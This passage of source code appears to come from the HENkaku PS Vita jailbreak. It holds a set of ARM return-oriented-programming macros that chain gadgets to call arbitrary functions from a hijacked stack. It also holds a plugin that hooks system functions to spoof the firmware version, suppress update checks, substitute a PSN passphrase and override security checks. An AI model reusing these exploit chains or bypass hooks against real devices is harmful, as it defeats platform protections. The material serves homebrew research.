187 |   .word cmp_eq_r0_r1_add_sp_8_bx_lr        // r3
188 |   .word 0xDEADBEEF                         // r5
189 |   blx_r3                                   // pc
190 |   .word 0xDEADBEEF                         // dummy
191 |   .word 0xDEADBEEF                         // dummy
192 |   .set lr_okay, 0
193 | .endm
194 | 
195 | // ret = f(*a0)
196 | .macro call_l f, a0
197 |   set_lr_to_add_sp_4_pop_pc                // pc
198 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
199 |   .word \a0                                // r0
200 |   .word ldr_r0_r0_bx_lr                    // pc
201 |   .word 0xDEADBEEF                         // dummy
202 |   .word \f                                 // pc
203 |   .word 0xDEADBEEF                         // dummy
204 |   .set lr_okay, 0
205 | .endm
206 | 
207 | // ret = f(*a0, a1)
208 | .macro call_lv f, a0, a1
209 |   set_lr_to_add_sp_4_pop_pc                // pc
210 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
211 |   .word \a0                                // r0
212 |   .word \a1                                // r1
213 |   .word 0xDEADBEEF                         // dummy
214 |   .word ldr_r0_r0_bx_lr                    // pc
215 |   .word 0xDEADBEEF                         // dummy
216 |   .word \f                                 // pc
217 |   .word 0xDEADBEEF                         // dummy
218 |   .set lr_okay, 0
219 | .endm
220 | 
221 | // ret = f(*a0, a1, a2)
222 | .macro call_lvv f, a0, a1, a2
223 |   set_lr_to_add_sp_4_pop_pc                // pc
224 |   .word pop_r0_r1_r2_r4_pc                 // pc
225 |   .word \a0                                // r0
226 |   .word \a1                                // r1
227 |   .word \a2                                // r2
228 |   .word 0xDEADBEEF                         // r4
229 |   .word ldr_r0_r0_bx_lr                    // pc
230 |   .word 0xDEADBEEF                         // dummy
231 |   .word \f                                 // pc
232 |   .word 0xDEADBEEF                         // dummy
233 |   .set lr_okay, 0
234 | .endm
235 | 
236 | // ret = f(*a0, a1, a2, a3)
237 | .macro call_lvvv f, a0, a1, a2, a3
238 |   set_lr_to_add_sp_4_pop_pc                // pc
239 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
240 |   .word \a0                                // r0
241 |   .word \a1                                // r1
242 |   .word \a2                                // r2
243 |   .word \a3                                // r3
244 |   .word 0xDEADBEEF                         // r4
245 |   .word 0xDEADBEEF                         // r5
246 |   .word 0xDEADBEEF                         // r7
247 |   .word ldr_r0_r0_bx_lr                    // pc
248 |   .word 0xDEADBEEF                         // dummy
249 |   .word \f                                 // pc
250 |   .word 0xDEADBEEF                         // dummy
251 |   .set lr_okay, 0
252 | .endm
253 | 
254 | // ret = f(*a0, *a1, a2, a3)
255 | .macro call_llvv f, a0, a1, a2, a3
256 |   set_lr_to_add_sp_4_pop_pc                // pc
257 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
258 |   .word \a0                                // r0
259 |   .word \a1                                // r1
260 |   .word \a2                                // r2
261 |   .word \a3                                // r3
262 |   .word 0xDEADBEEF                         // r4
263 |   .word 0xDEADBEEF                         // r5
264 |   .word 0xDEADBEEF                         // r7
265 |   .word ldr_r0_r0_bx_lr                    // pc
266 |   .word 0xDEADBEEF                         // dummy
267 |   .word movs_r1_r0_pop_r4_pc               // pc
268 |   .word 0xDEADBEEF                         // r4
269 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
270 |   .word \a0                                // r0
271 |   .word ldr_r0_r0_bx_lr                    // pc
272 |   .word 0xDEADBEEF                         // dummy
273 |   .word \f                                 // pc
274 |   .word 0xDEADBEEF                         // dummy
275 |   .set lr_okay, 0
276 | .endm
277 | 
278 | // ret = f(ret, a1)
279 | .macro call_rv f, a0, a1
280 |   set_r1 \a1                               // pc
281 |   .word pop_r3_r5_pc                       // pc
282 |   .word \f                                 // r3
283 |   .word 0xDEADBEEF                         // r5
284 |   blx_r3                                   // pc
285 |   .set lr_okay, 0
286 | .endm
287 | 
288 | // ret = f(a0, *a1)
289 | .macro call_vl f, a0, a1
290 |   set_lr_to_add_sp_4_pop_pc                // pc
291 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
292 |   .word \a1                                // r0
293 |   .word ldr_r0_r0_bx_lr                    // pc
294 |   .word 0xDEADBEEF                         // dummy
295 |   .word movs_r1_r0_pop_r4_pc               // pc
296 |   .word 0xDEADBEEF                         // r4
297 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
298 |   .word \a0                                // r0
299 |   .word \f                                 // pc
300 |   .word 0xDEADBEEF                         // dummy
301 |   .set lr_okay, 0
302 | .endm
303 | 
304 | // ret = f(a0)
305 | .macro call_v f, a0
306 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
307 |   .word \a0                                // r0
308 |   .word \f                                 // r1
309 |   .word 0xDEADBEEF                         // dummy
310 |   .word blx_r1_add_sp_4_pop_pc             // pc
311 |   .word 0xDEADBEEF                         // dummy
312 |   .set lr_okay, 0
313 | .endm
314 | 
315 | // ret = f(a0, a1)
316 | .macro call_vv f, a0, a1
317 |   .word pop_r0_r1_r2_r4_pc                 // pc
318 |   .word \a0                                // r0
319 |   .word \a1                                // r1
320 |   .word \f                                 // r2
321 |   .word 0xDEADBEEF                         // r4
322 |   .word blx_r2_add_sp_c_pop_pc             // pc
323 |   .word 0xDEADBEEF                         // dummy
324 |   .word 0xDEADBEEF                         // dummy
325 |   .word 0xDEADBEEF                         // dummy
326 |   .set lr_okay, 0
327 | .endm
328 | 
329 | // ret = f(a0, a1, a2)
330 | .macro call_vvv f, a0, a1, a2
331 |   set_lr_to_add_sp_4_pop_pc                // pc
332 |   .word pop_r0_r1_r2_r4_pc                 // pc
333 |   .word \a0                                // r0
334 |   .word \a1                                // r1
335 |   .word \a2                                // r2
336 |   .word 0xDEADBEEF                         // r4
337 |   .word \f                                 // pc
338 |   .word 0xDEADBEEF                         // dummy
339 |   .set lr_okay, 0
340 | .endm
341 | 
342 | // ret = f(a0, a1, a2, a3)
343 | .macro call_vvvv f, a0, a1, a2, a3
344 |   call_vvvvv \f, \a0, \a1, \a2, \a3, 0xDEADBEEF
345 | .endm
346 | 
347 | // ret = f(a0, a1, a2, a3, a4)
348 | .macro call_vvvvv f, a0, a1, a2, a3, a4
349 |   set_lr_to_add_sp_4_pop_pc                // pc
350 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
351 |   .word \a0                                // r0
352 |   .word \a1                                // r1
353 |   .word \a2                                // r2
354 |   .word \a3                                // r3
355 |   .word 0xDEADBEEF                         // r4
356 |   .word 0xDEADBEEF                         // r5
357 |   .word 0xDEADBEEF                         // r7
358 |   .word \f                                 // pc
359 |   .word \a4                                // on stack
360 |   .set lr_okay, 0
361 | .endm
362 | 
363 | // ret = f(a0, a1, a2, a3, a4, a5)
364 | .macro call_vvvvvv f, a0, a1, a2, a3, a4, a5
365 |   call_vvvvvvv \f, \a0, \a1, \a2, \a3, \a4, \a5, 0xDEADBEEF
366 | .endm
367 | 
368 | // ret = f(a0, a1, a2, a3, a4, a5, a6)
369 | .macro call_vvvvvvv f, a0, a1, a2, a3, a4, a5, a6
370 |   set_lr_to_add_sp_14_pop_pc               // pc
371 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
372 |   .word \a0                                // r0
373 |   .word \a1                                // r1
374 |   .word \a2                                // r2
375 |   .word \a3                                // r3
376 |   .word 0xDEADBEEF                         // r4
377 |   .word 0xDEADBEEF                         // r5
378 |   .word 0xDEADBEEF                         // r7
379 |   .word \f                                 // pc
380 |   .word \a4                                // on stack
381 |   .word \a5                                // on stack
382 |   .word \a6                                // on stack
383 |   .word 0xDEADBEEF                         // dummy
384 |   .word 0xDEADBEEF                         // dummy
385 |   .set lr_okay, 0
386 | .endm
387 | 
388 | // ret = (*f)(*a0)
389 | .macro load_call_l f, a0
390 |   load_call_lv \f, \a0, 0xDEADBEEF
391 | .endm
392 | 
393 | // ret = (*f)(*a0, a1)
394 | .macro load_call_lv f, a0, a1
395 |   set_lr_to_add_sp_4_pop_pc                // pc
396 |   store_lv \f, call_\@                     // pc
397 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
398 |   .word \a0                                // r0
399 |   .word \a1                                // r1
400 |   .word 0xDEADBEEF                         // dummy
401 |   .word ldr_r0_r0_bx_lr                    // pc
402 |   .word 0xDEADBEEF                         // dummy
403 | call_\@:
404 |   .word 0xDEADBEEF                         // pc
405 |   .word 0xDEADBEEF                         // dummy
406 |   .set lr_okay, 0
407 | .endm
408 | 
409 | // ret = (*f)(*a0, a1, a2)
410 | .macro load_call_lvv f, a0, a1, a2
411 |   set_lr_to_add_sp_4_pop_pc                // pc
412 |   store_lv \f, call_\@                     // pc
413 |   .word pop_r0_r1_r2_r4_pc                 // pc
414 |   .word \a0                                // r0
415 |   .word \a1                                // r1
416 |   .word \a2                                // r2
417 |   .word 0xDEADBEEF                         // r4
418 |   .word ldr_r0_r0_bx_lr                    // pc
419 |   .word 0xDEADBEEF                         // dummy
420 | call_\@:
421 |   .word 0xDEADBEEF                         // pc
422 |   .word 0xDEADBEEF                         // dummy
423 |   .set lr_okay, 0
424 | .endm
425 | 
426 | // ret = (*f)(*a0, a1, a2)
427 | .macro load_call_lvv_2 f, a0, a1, a2
428 |   set_lr_to_add_sp_4_pop_pc                // pc
429 |   store_lv \f, call_\@                     // pc
430 |   .word pop_r0_r1_r2_r4_pc                 // pc
431 |   .word \a0                                // r0
432 |   .word \a1                                // r1
433 |   .word \a2                                // r2
434 |   .word 0xDEADBEEF                         // r4
435 |   .word ldr_r0_r0_bx_lr                    // pc
436 |   .word 0xDEADBEEF                         // dummy
437 |   .word add_sp_14_pop_pc                   // pc
438 |   .word 0xDEADBEEF                         // dummy
439 |   .word 0xDEADBEEF                         // dummy
440 |   .word 0xDEADBEEF                         // dummy
441 |   .word 0xDEADBEEF                         // dummy
442 |   .word 0xDEADBEEF                         // dummy
443 | call_\@:
444 |   .word 0xDEADBEEF                         // pc
445 |   .word 0xDEADBEEF                         // dummy
446 |   .set lr_okay, 0
447 | .endm
448 | 
449 | // ret = (*f)(*a0, a1, a2, a3)
450 | .macro load_call_lvvv f, a0, a1, a2, a3
451 |   set_lr_to_add_sp_4_pop_pc                // pc
452 |   store_lv \f, call_\@                     // pc
453 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
454 |   .word \a0                                // r0
455 |   .word \a1                                // r1
456 |   .word \a2                                // r2
457 |   .word \a3                                // r3
458 |   .word 0xDEADBEEF                         // r4
459 |   .word 0xDEADBEEF                         // r5
460 |   .word 0xDEADBEEF                         // r7
461 |   .word ldr_r0_r0_bx_lr                    // pc
462 |   .word 0xDEADBEEF                         // dummy
463 | call_\@:
464 |   .word 0xDEADBEEF                         // pc
465 |   .word 0xDEADBEEF                         // dummy
466 |   .set lr_okay, 0
467 | .endm
468 | 
469 | // ret = (*f)(*a0, *a1, a2, a3)
470 | .macro load_call_llvv f, a0, a1, a2, a3
471 |   set_lr_to_add_sp_4_pop_pc                // pc
472 |   store_lv \f, call_\@                     // pc
473 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
474 |   .word \a1                                // r0
475 |   .word 0xDEADBEEF                         // r1
476 |   .word \a2                                // r2
477 |   .word \a3                                // r3
478 |   .word 0xDEADBEEF                         // r4
479 |   .word 0xDEADBEEF                         // r5
480 |   .word 0xDEADBEEF                         // r7
481 |   .word ldr_r0_r0_bx_lr                    // pc
482 |   .word 0xDEADBEEF                         // dummy
483 |   .word movs_r1_r0_pop_r4_pc               // pc
484 |   .word 0xDEADBEEF                         // r4
485 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
486 |   .word \a0                                // r0
487 |   .word ldr_r0_r0_bx_lr                    // pc
488 |   .word 0xDEADBEEF                         // dummy
489 | call_\@:
490 |   .word 0xDEADBEEF                         // pc
491 |   .word 0xDEADBEEF                         // dummy
492 |   .set lr_okay, 0
493 | .endm
494 | 
495 | // ret = (*f)(a0)
496 | .macro load_call_v f, a0
497 |   set_lr_to_add_sp_4_pop_pc                // pc
498 |   store_lv \f, call_\@                     // pc
499 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
500 |   .word \a0                                // r0
501 | call_\@:
502 |   .word 0xDEADBEEF                         // pc
503 |   .word 0xDEADBEEF                         // dummy
504 |   .set lr_okay, 0
505 | .endm
506 | 
507 | // ret = (*f)(a0, a1)
508 | .macro load_call_vv f, a0, a1
509 |   set_lr_to_add_sp_4_pop_pc                // pc
510 |   store_lv \f, call_\@                     // pc
511 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
512 |   .word \a0                                // r0
513 |   .word \a1                                // r1
514 |   .word 0xDEADBEEF                         // dummy
515 | call_\@:
516 |   .word 0xDEADBEEF                         // pc
517 |   .word 0xDEADBEEF                         // dummy
518 |   .set lr_okay, 0
519 | .endm
520 | 
521 | // ret = (*f)(a0, a1, a2)
522 | .macro load_call_vvv f, a0, a1, a2
523 |   set_lr_to_add_sp_4_pop_pc                // pc
524 |   store_lv \f, call_\@                     // pc
525 |   .word pop_r0_r1_r2_r4_pc                 // pc
526 |   .word \a0                                // r0
527 |   .word \a1                                // r1
528 |   .word \a2                                // r2
529 |   .word 0xDEADBEEF                         // r4
530 | call_\@:
531 |   .word 0xDEADBEEF                         // pc
532 |   .word 0xDEADBEEF                         // dummy
533 |   .set lr_okay, 0
534 | .endm
535 | 
536 | // ret = (*f)(a0, a1, a2, a3)
537 | .macro load_call_vvvv f, a0, a1, a2, a3
538 |   load_call_vvvvv \f, \a0, \a1, \a2, \a3, 0xDEADBEEF
539 | .endm
540 | 
541 | // ret = (*f)(a0, a1, a2, a3, a4)
542 | .macro load_call_vvvvv f, a0, a1, a2, a3, a4
543 |   set_lr_to_add_sp_4_pop_pc                // pc
544 |   store_lv \f, call_\@                     // pc
545 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
546 |   .word \a0                                // r0
547 |   .word \a1                                // r1
548 |   .word \a2                                // r2
549 |   .word \a3                                // r3
550 |   .word 0xDEADBEEF                         // r4
551 |   .word 0xDEADBEEF                         // r5
552 |   .word 0xDEADBEEF                         // r7
553 | call_\@:
554 |   .word 0xDEADBEEF                         // pc
555 |   .word \a4                                // on stack
556 |   .set lr_okay, 0
557 | .endm
558 | 
559 | // ret = (*f)(a0, a1, a2, a3, a4, a5)
560 | .macro load_call_vvvvvv f, a0, a1, a2, a3, a4, a5
561 |   load_call_vvvvvvv \f, \a0, \a1, \a2, \a3, \a4, \a5, 0xDEADBEEF
562 | .endm
563 | 
564 | // ret = (*f)(a0, a1, a2, a3, a4, a5, a6)
565 | .macro load_call_vvvvvvv f, a0, a1, a2, a3, a4, a5, a6
566 |   set_lr_to_add_sp_4_pop_pc                // pc
567 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
568 |   .word \f                                 // r0
569 |   .word ldm_data_r8 + 0x18                 // r1
570 |   .word 0xDEADBEEF                         // dummy
571 |   .word ldr_r0_r0_bx_lr                    // pc
572 |   .word 0xDEADBEEF                         // dummy
573 |   .word str_r0_r1_add_sp_4_pop_pc          // pc
574 |   .word 0xDEADBEEF                         // dummy
575 |   .word pop_r4_r5_r6_r7_r8_sb_pc           // pc
576 |   .word 0xDEADBEEF                         // r4
577 |   .word 0xDEADBEEF                         // r5
578 |   .word 0xDEADBEEF                         // r6
579 |   .word 0xDEADBEEF                         // r7
580 |   .word ldm_data_r8                        // r8
581 |   .word 0xDEADBEEF                         // sb
582 |   .word ldm_r8_r0_r1_r4_r5_sl_ip_lr_pc     // pc
583 |   .word pop_r0_r1_r2_r3_r4_r5_r7_pc        // pc
584 |   .word \a0                                // r0
585 |   .word \a1                                // r1
586 |   .word \a2                                // r2
587 |   .word \a3                                // r3
588 |   .word 0xDEADBEEF                         // r4
589 |   .word 0xDEADBEEF                         // r5
590 |   .word 0xDEADBEEF                         // r7
591 |   .word blx_lr_add_sp_14_pop_pc            // pc
592 |   .word \a4                                // on stack
593 |   .word \a5                                // on stack
594 |   .word \a6                                // on stack
595 |   .word 0xDEADBEEF                         // dummy
596 |   .word 0xDEADBEEF                         // dummy
597 |   .set lr_okay, 0
598 | .endm
599 | 


--------------------------------------------------------------------------------
/plugin/user.c:
--------------------------------------------------------------------------------
  1 | #include <psp2/kernel/clib.h>
  2 | #include <psp2/kernel/modulemgr.h>
  3 | #include <psp2/io/fcntl.h>
  4 | #include <psp2/io/stat.h>
  5 | #include <psp2/registrymgr.h>
  6 | #include <psp2/system_param.h>
  7 | #include <psp2/power.h>
  8 | #include <taihen.h>
  9 | #include "henkaku.h"
 10 | #include "language.h"
 11 | #include "config.h"
 12 | 
 13 | int _vshIoMount(int id, const char *path, int permissions, void *opt);
 14 | int _vshSblGetSystemSwVersion(SceKernelFwInfo *info);
 15 | 
 16 | extern unsigned char _binary_system_settings_xml_start;
 17 | extern unsigned char _binary_system_settings_xml_size;
 18 | extern unsigned char _binary_henkaku_settings_xml_start;
 19 | extern unsigned char _binary_henkaku_settings_xml_size;
 20 | 
 21 | static henkaku_config_t config;
 22 | 
 23 | static SceUID g_hooks[15];
 24 | 
 25 | static tai_hook_ref_t g_sceKernelGetSystemSwVersion_SceSettings_hook;
 26 | static int sceKernelGetSystemSwVersion_SceSettings_patched(SceKernelFwInfo *info) {
 27 |   int ret;
 28 |   SceKernelFwInfo real_info;
 29 |   ret = TAI_CONTINUE(int, g_sceKernelGetSystemSwVersion_SceSettings_hook, info);
 30 |   sceClibMemset(&real_info, 0, sizeof(SceKernelFwInfo));
 31 |   real_info.size = sizeof(SceKernelFwInfo);
 32 |   _vshSblGetSystemSwVersion(&real_info);
 33 |   if (BETA_RELEASE) {
 34 |     sceClibSnprintf(info->versionString, 16, "%s \xE5\xA4\x89\xE9\x9D\xA9-%d\xCE\xB2%d", real_info.versionString, HENKAKU_RELEASE, BETA_RELEASE);
 35 |   } else if (HENKAKU_RELEASE > 1) {
 36 |     sceClibSnprintf(info->versionString, 16, "%s \xE5\xA4\x89\xE9\x9D\xA9-%d", real_info.versionString, HENKAKU_RELEASE);
 37 |   } else {
 38 |     sceClibSnprintf(info->versionString, 16, "%s \xE5\xA4\x89\xE9\x9D\xA9", real_info.versionString);
 39 |   }
 40 |   return ret;
 41 | }
 42 | 
 43 | static tai_hook_ref_t g_update_check_hook;
 44 | static int update_check_patched(int a1, int a2, int *a3, int a4, int a5) {
 45 |   TAI_CONTINUE(int, g_update_check_hook, a1, a2, a3, a4, a5);
 46 |   *a3 = 0;
 47 |   return 0;
 48 | }
 49 | 
 50 | static tai_hook_ref_t g_game_update_check_hook;
 51 | static int game_update_check_patched(int newver, int *needsupdate) {
 52 |   TAI_CONTINUE(int, g_game_update_check_hook, newver, needsupdate);
 53 |   *needsupdate = 0;
 54 |   return 0;
 55 | }
 56 | 
 57 | static tai_hook_ref_t g_passphrase_decrypt_hook;
 58 | static void passphrase_decrypt_patched(void *dat0, void *dat1, void *dat2, char *passphrase, int *result) {
 59 |   TAI_CONTINUE(void, g_passphrase_decrypt_hook, dat0, dat1, dat2, passphrase, result);
 60 |   if (config.use_psn_spoofing && PSN_PASSPHRASE[0] != '\0' && *result == 1) {
 61 |     sceClibMemcpy(passphrase, PSN_PASSPHRASE, sizeof(PSN_PASSPHRASE));
 62 |   }
 63 | }
 64 | 
 65 | static tai_hook_ref_t g_SceVshBridge_333875AB_SceShell_hook;
 66 | static int SceVshBridge_333875AB_SceShell_patched(void) {
 67 |   TAI_CONTINUE(int, g_SceVshBridge_333875AB_SceShell_hook);
 68 |   return 1;
 69 | }
 70 | 
 71 | static void save_config_user(void) {
 72 |   SceUID fd;
 73 |   int rd;
 74 |   fd = sceIoOpen(CONFIG_PATH, SCE_O_TRUNC | SCE_O_CREAT | SCE_O_WRONLY, 6);
 75 |   if (fd >= 0) {
 76 |     rd = sceIoWrite(fd, &config, sizeof(config));
 77 |     sceIoClose(fd);
 78 |     if (rd != sizeof(config)) {
 79 |       LOG("config not right size: %d", rd);
 80 |     }
 81 |   } else {
 82 |     LOG("could not write config file");
 83 |   }
 84 | }
 85 | 
 86 | static int load_config_user(void) {
 87 |   SceUID fd;
 88 |   int rd;
 89 |   int migrate = 0;
 90 |   fd = sceIoOpen(CONFIG_PATH, SCE_O_RDONLY, 0);
 91 |   if (fd < 0) {
 92 |     fd = sceIoOpen(OLD_CONFIG_PATH, SCE_O_RDONLY, 0);
 93 |     migrate = 1;
 94 |   }
 95 |   if (fd >= 0) {
 96 |     rd = sceIoRead(fd, &config, sizeof(config));
 97 |     sceIoClose(fd);
 98 |     if (rd == sizeof(config)) {
 99 |       if (config.magic == HENKAKU_CONFIG_MAGIC) {
100 |         if (config.version >= 0) {
101 |           if (migrate) {
102 |             LOG("migrating settings to new path");
103 |             save_config_user();
104 |             sceIoRemove(OLD_CONFIG_PATH);
105 |           }
106 |           return 0;
107 |         } else {
108 |           LOG("config version too old");
109 |         }
110 |       } else {
111 |         LOG("config incorrect magic: %x", config.magic);
112 |       }
113 |     } else {
114 |       LOG("config not right size: %d", rd);
115 |     }
116 |   } else {
117 |     LOG("config file not found");
118 |   }
119 |   // default config
120 |   config.magic = HENKAKU_CONFIG_MAGIC;
121 |   config.version = HENKAKU_RELEASE;
122 |   config.use_psn_spoofing = 1;
123 |   config.allow_unsafe_hb = 0;
124 |   config.use_spoofed_version = 1;
125 |   config.spoofed_version = SPOOF_VERSION;
126 |   return 0;
127 | }
128 | 
129 | static tai_hook_ref_t g_sceRegMgrGetKeyInt_SceSystemSettingsCore_hook;
130 | static int sceRegMgrGetKeyInt_SceSystemSettingsCore_patched(const char *category, const char *name, int *value) {
131 |   if (sceClibStrncmp(category, "/CONFIG/HENKAKU", 15) == 0) {
132 |     if (value) {
133 |       load_config_user();
134 |       if (sceClibStrncmp(name, "enable_psn_spoofing", 19) == 0) {
135 |         *value = config.use_psn_spoofing;
136 |       } else if (sceClibStrncmp(name, "enable_unsafe_homebrew", 22) == 0) {
137 |         *value = config.allow_unsafe_hb;
138 |       } else if (sceClibStrncmp(name, "enable_version_spoofing", 23) == 0) {
139 |         *value = config.use_spoofed_version;
140 |       }
141 |     }
142 |     return 0;
143 |   }
144 |   return TAI_CONTINUE(int, g_sceRegMgrGetKeyInt_SceSystemSettingsCore_hook, category, name, value);
145 | }
146 | 
147 | static tai_hook_ref_t g_sceRegMgrSetKeyInt_SceSystemSettingsCore_hook;
148 | static int sceRegMgrSetKeyInt_SceSystemSettingsCore_patched(const char *category, const char *name, int value) {
149 |   if (sceClibStrncmp(category, "/CONFIG/HENKAKU", 15) == 0) {
150 |     if (sceClibStrncmp(name, "enable_psn_spoofing", 19) == 0) {
151 |       config.use_psn_spoofing = value;
152 |     } else if (sceClibStrncmp(name, "enable_unsafe_homebrew", 22) == 0) {
153 |       config.allow_unsafe_hb = value;
154 |     } else if (sceClibStrncmp(name, "enable_version_spoofing", 23) == 0) {
155 |       config.use_spoofed_version = value;
156 |     }
157 |     save_config_user();
158 |     henkaku_reload_config();
159 |     return 0;
160 |   }
161 |   return TAI_CONTINUE(int, g_sceRegMgrSetKeyInt_SceSystemSettingsCore_hook, category, name, value);
162 | }
163 | 
164 | static void build_version_string(int version, char *string, int length) {
165 |   if (version && string && length >= 6) {
166 |     char a = (version >> 24) & 0xF;
167 |     char b = (version >> 20) & 0xF;
168 |     char c = (version >> 16) & 0xF;
169 |     char d = (version >> 12) & 0xF;
170 |     sceClibMemset(string, 0, length);
171 |     string[0] = '0' + a;
172 |     string[1] = '.';
173 |     string[2] = '0' + b;
174 |     string[3] = '0' + c;
175 |     string[4] = '\0';
176 |     if (d) {
177 |       string[4] = '0' + d;
178 |       string[5] = '\0';
179 |     }
180 |   }
181 | }
182 | 
183 | static tai_hook_ref_t g_sceRegMgrGetKeyStr_SceSystemSettingsCore_hook;
184 | static int sceRegMgrGetKeyStr_SceSystemSettingsCore_patched(const char *category, const char *name, char *string, int length) {
185 |   if (sceClibStrncmp(category, "/CONFIG/HENKAKU", 15) == 0) {
186 |     if (sceClibStrncmp(name, "spoofed_version", 15) == 0) {
187 |       if (string != NULL) {
188 |         load_config_user();
189 |         build_version_string(config.spoofed_version ? config.spoofed_version : SPOOF_VERSION, string, length);
190 |       }
191 |     }
192 |     return 0;
193 |   }
194 |   return TAI_CONTINUE(int, g_sceRegMgrGetKeyStr_SceSystemSettingsCore_hook, category, name, string, length);
195 | }
196 | 
197 | #define IS_DIGIT(i) (i >= '0' && i <= '9')
198 | static tai_hook_ref_t g_sceRegMgrSetKeyStr_SceSystemSettingsCore_hook;
199 | static int sceRegMgrSetKeyStr_SceSystemSettingsCore_patched(const char *category, const char *name, const char *string, int length) {
200 |   if (sceClibStrncmp(category, "/CONFIG/HENKAKU", 15) == 0) {
201 |     if (sceClibStrncmp(name, "spoofed_version", 15) == 0) {
202 |       if (string != NULL) {
203 |         if (IS_DIGIT(string[0]) && string[1] == '.' && IS_DIGIT(string[2]) && IS_DIGIT(string[3])) {
204 |           char a = string[0] - '0';
205 |           char b = string[2] - '0';
206 |           char c = string[3] - '0';
207 |           char d = IS_DIGIT(string[4]) ? string[4] - '0' : '\0';
208 |           config.spoofed_version = ((a << 24) | (b << 20) | (c << 16) | (d << 12));
209 |           save_config_user();
210 |           henkaku_reload_config();
211 |         }
212 |       }
213 |     }
214 |     return 0;
215 |   }
216 |   return TAI_CONTINUE(int, g_sceRegMgrSetKeyStr_SceSystemSettingsCore_hook, category, name, string, length);
217 | }
218 | 
219 | typedef struct {
220 |   int size;
221 |   const char *name;
222 |   int type;
223 |   int unk;
224 | } SceRegMgrKeysInfo;
225 | 
226 | static tai_hook_ref_t g_sceRegMgrGetKeysInfo_SceSystemSettingsCore_hook;
227 | static int sceRegMgrGetKeysInfo_SceSystemSettingsCore_patched(const char *category, SceRegMgrKeysInfo *info, int unk) {
228 |   if (sceClibStrncmp(category, "/CONFIG/HENKAKU", 15) == 0) {
229 |     if (info) {
230 |       if (sceClibStrncmp(info->name, "spoofed_version", 15) == 0) {
231 |         info->type = 0x00030001; // type string
232 |       } else {
233 |         info->type = 0x00040000; // type integer
234 |       }
235 |     }
236 |     return 0;
237 |   }
238 |   return TAI_CONTINUE(int, g_sceRegMgrGetKeysInfo_SceSystemSettingsCore_hook, category, info, unk);
239 | }
240 | 
241 | static int (* g_OnButtonEventIduSettings_hook)(const char *id, int a2, void *a3);
242 | static int OnButtonEventIduSettings_patched(const char *id, int a2, void *a3) {
243 |   int ret;
244 |   uint32_t buf[6];
245 |   if (sceClibStrncmp(id, "id_reload_taihen_config", 23) == 0) {
246 |     return taiReloadConfig();
247 |   } else if (sceClibStrncmp(id, "id_reboot_device", 16) == 0) {
248 |     return scePowerRequestColdReset();
249 |   } else if (sceClibStrncmp(id, "id_unlink_memory_card", 21) == 0) {
250 |     sceClibMemset(buf, 0, sizeof(buf));
251 |     if ((ret = _vshIoMount(0x800, NULL, 2, buf)) < 0) {
252 |       if (ret != 0x80010011) { // SCE_ERROR_ERRNO_EEXIST (already mounted)
253 |         return ret;
254 |       }
255 |     }
256 |     if ((ret = sceIoRemove("ux0:id.dat")) < 0) {
257 |       if (ret != 0x80010002) { // SCE_ERROR_ERRNO_ENOENT (no entry)
258 |         return ret;
259 |       }
260 |     }
261 |     return 0;
262 |   }
263 |   return g_OnButtonEventIduSettings_hook(id, a2, a3);
264 | }
265 | 
266 | static tai_hook_ref_t g_scePafToplevelInitPluginFunctions_SceSettings_hook;
267 | static int scePafToplevelInitPluginFunctions_SceSettings_patched(void *a1, int a2, uint32_t *funcs) {
268 |   int res = TAI_CONTINUE(int, g_scePafToplevelInitPluginFunctions_SceSettings_hook, a1, a2, funcs);
269 |   char *plugin = (char *)((uint32_t *)a1)[1];
270 |   if (sceClibStrncmp(plugin, "idu_settings_plugin", 19) == 0) {
271 |     if (funcs[6] != (uint32_t)OnButtonEventIduSettings_patched) {
272 |       g_OnButtonEventIduSettings_hook = (void *)funcs[6];
273 |       funcs[6] = (uint32_t)OnButtonEventIduSettings_patched;
274 |     }
275 |   }
276 |   return res;
277 | }
278 | 
279 | static tai_hook_ref_t g_scePafMiscLoadXmlLayout_SceSettings_hook;
280 | static int scePafMiscLoadXmlLayout_SceSettings_patched(int a1, void *xml_buf, int xml_size, int a4) {
281 |   if ((82+22) < xml_size && sceClibStrncmp(xml_buf+82, "system_settings_plugin", 22) == 0) {
282 |     xml_buf = (void *)&_binary_system_settings_xml_start;
283 |     xml_size = (int)&_binary_system_settings_xml_size;
284 |   } else if ((79+19) < xml_size && sceClibStrncmp(xml_buf+79, "idu_settings_plugin", 19) == 0) {
285 |     xml_buf = (void *)&_binary_henkaku_settings_xml_start;
286 |     xml_size = (int)&_binary_henkaku_settings_xml_size;
287 |   }
288 |   return TAI_CONTINUE(int, g_scePafMiscLoadXmlLayout_SceSettings_hook, a1, xml_buf, xml_size, a4);
289 | }
290 | 
291 | static tai_hook_ref_t g_scePafToplevelGetText_SceSystemSettingsCore_hook;
292 | static wchar_t *scePafToplevelGetText_SceSystemSettingsCore_patched(void *arg, char **msg) {
293 |   language_container_t *language_container;
294 |   int language = -1;
295 |   sceRegMgrGetKeyInt("/CONFIG/SYSTEM", "language", &language);
296 |   switch (language) {
297 |     case SCE_SYSTEM_PARAM_LANG_JAPANESE:      language_container = &language_japanese;      break;
298 |     case SCE_SYSTEM_PARAM_LANG_ENGLISH_US:    language_container = &language_english_us;    break;
299 |     case SCE_SYSTEM_PARAM_LANG_FRENCH:        language_container = &language_french;        break;
300 |     case SCE_SYSTEM_PARAM_LANG_SPANISH:       language_container = &language_spanish;       break;
301 |     case SCE_SYSTEM_PARAM_LANG_GERMAN:        language_container = &language_german;        break;
302 |     case SCE_SYSTEM_PARAM_LANG_ITALIAN:       language_container = &language_italian;       break;
